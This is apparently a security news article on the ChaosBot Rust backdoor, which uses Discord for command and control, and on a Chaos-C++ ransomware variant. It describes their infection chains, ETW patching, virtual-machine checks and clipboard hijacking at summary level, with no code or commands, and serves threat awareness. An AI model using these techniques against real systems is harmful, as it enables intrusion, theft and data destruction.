Cybersecurity researchers have uncovered a sophisticated new Rust-based backdoor named ChaosBot, capable of conducting reconnaissance and executing arbitrary commands on compromised systems. The malware was first detected in late September 2025 within a financial services environment, according to Canadian cybersecurity firm eSentire.
“Threat actors leveraged compromised credentials that mapped to both Cisco VPN and an over-privileged Active Directory account named, ‘serviceaccount,'” eSentire said in a technical report published last week. “Using the compromised account, they leveraged WMI to execute remote commands across systems in the network, facilitating the deployment and execution of ChaosBot.”
ChaosBot is notable for its use of Discord as a command-and-control (C2) channel. The malware receives instructions from a Discord profile maintained by the threat actor using the alias “chaos_00019,” with a second account, lovebb0024, also linked to operations. It can also spread through phishing messages containing a malicious Windows shortcut (LNK) file, which triggers a PowerShell command to download and execute ChaosBot while displaying a decoy PDF. Once deployed, it sideloads a malicious DLL, “msedge_elf.dll,” via Microsoft Edge’s “identity_helper.exe,” performs system reconnaissance, and downloads a fast reverse proxy to maintain persistent access.
“New variants of ChaosBot make use of evasion techniques to bypass ETW [Event Tracing for Windows] and virtual machines,” eSentire said. The malware patches instructions in ntdll!EtwEventWrite and checks MAC addresses against known VMware and VirtualBox prefixes to avoid detection. Supported commands include executing shell commands, capturing screenshots, and transferring files to and from Discord channels.
In a related threat, Fortinet FortiGuard Labs detailed a new Chaos-C++ ransomware variant that introduces destructive file deletion and clipboard hijacking for cryptocurrency theft. “This dual strategy of destructive encryption and covert financial theft underscores Chaos’ transition into a more aggressive and multifaceted threat designed to maximize financial gain,” the company said. The ransomware, distributed under the guise of utilities like System Optimizer v2.1, targets files smaller than 50 MB for encryption, deletes files over 1.3 GB, and swaps Bitcoin addresses in clipboard content to redirect transactions.
“Rather than relying solely on full file encryption, Chaos-C++ employs a combination of methods, including symmetric or asymmetric encryption and a fallback XOR routine,” Fortinet said. The malware also ensures successful execution via a versatile downloader, making both ChaosBot and Chaos-C++ robust and difficult to disrupt, posing significant threats to enterprises worldwide.
